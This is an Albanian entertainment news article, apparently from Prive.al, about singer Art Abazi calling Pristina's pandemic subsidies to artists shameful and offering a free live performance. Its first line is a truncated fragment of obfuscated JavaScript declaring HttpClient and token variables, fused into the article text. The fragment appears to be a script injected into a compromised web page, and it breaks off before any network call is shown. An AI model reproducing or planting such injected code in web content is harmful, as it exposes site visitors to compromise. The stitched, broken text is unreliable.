;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Art Abazi kundër pagesave me para publike, i gatshëm për performancë falas

By

Para publike drejt figurave publike.

Kjo ka qenë tema kryesore që ka ngjallur debat ditëve të fundit andej e këtej kufirit.

Teksa u zbuluan rrogat e gazetareve Bieta Sulo dhe Mira Kazhani në kompani ujësjellësi në Shqipëri, në Kosovë dolën listat e pagesave si subvencione nga Komuna e Prishtinës.

Shpat Deda, Fatmir Spahiu e Mentor Shuki ishin vetëm disa prej emrave të njohur që ishin paguar për performanca e realzime përgjatë pandemisë, me projektin ‘Lajme pozitive gjatë pandemisë’ të aktorit Spahiu si një prej më epikëve.

Ndonëse një pjesë prej tyre u sqaruan përmes rrjeteve sociale për pagesat në kohë pandemie nga Komuna, një tjetër artist e ka thënë fjalën e tij.

Fjala është për Art Abazin i cili është shfaqur kundër pagesave të tilla në kohë duke dalë vullnetar që të performojë pa asnjë pagesë.

‘Me gjithë respektin për artistët që janë të përfshirë në këtë listë, ky subvencion lirisht mund të quhet i turpshëm. Pse? Sepse shumica prej jush pothuajse konstant keni qenë të thirrur, angazhuar e të paguar nga Komuna jonë andaj për hir të këtij fakti është dashtë me u solidarizu me situatën në të cilën ndodhemi. Përndryshe të kërkohen mjete për fëmijët që ekanë të pamundur ndjekjen e mësimit online për shkak të mungesës së një laptopi e në anën tjetër të ndahen 1000 euro për katër receta kuzhine? Paradoks ma të neveritshëm nuk pasna pa. Më falni. Me këtë rast, shpreh gatishmërinë time për një live performancë në kushte shtëpie pa asnjë kompenzim financiar pavarësisht që edhe une si artist modest kom nevojë për përkrahje ka Komuna jonë, sidomos kur një përkrahje e tillë ka mungu deri sot.’ – është shprehur këngëtari përmes një reagimi në Instagram.

Kujtojmë se në një prononcim për Klan Kosova, një prej të apostrofuarve, Fatmir Spahiu tha se kostoja e organizimit të projektit për të cilin është subvencionuar ‘është shumë më e lartë se vlera e pranuar nga Komuna’. /Prive.al

Artikuj të ngjashëm